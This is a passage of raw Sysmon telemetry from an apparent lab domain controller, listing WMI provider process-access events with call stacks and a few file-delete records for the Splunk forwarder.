Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-AAAA-00000000AD01}14736C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D99-603E-AAAA-00000000AD01}1473610488C:\Windows\system32\conhost.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002239450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3AFA31341B6F032FD6D33C84F360F4EA,SHA256=F2554717DFD523A4859F854B72BB27C4507A0F179E325B55C0B212EB6D6F6BBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B8ECC44C8DE7577AC3CF248EFC4826A,SHA256=B7C0341D8727BBA54E149D357864C4F9FA37D31B92775639E4044773067AB9E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\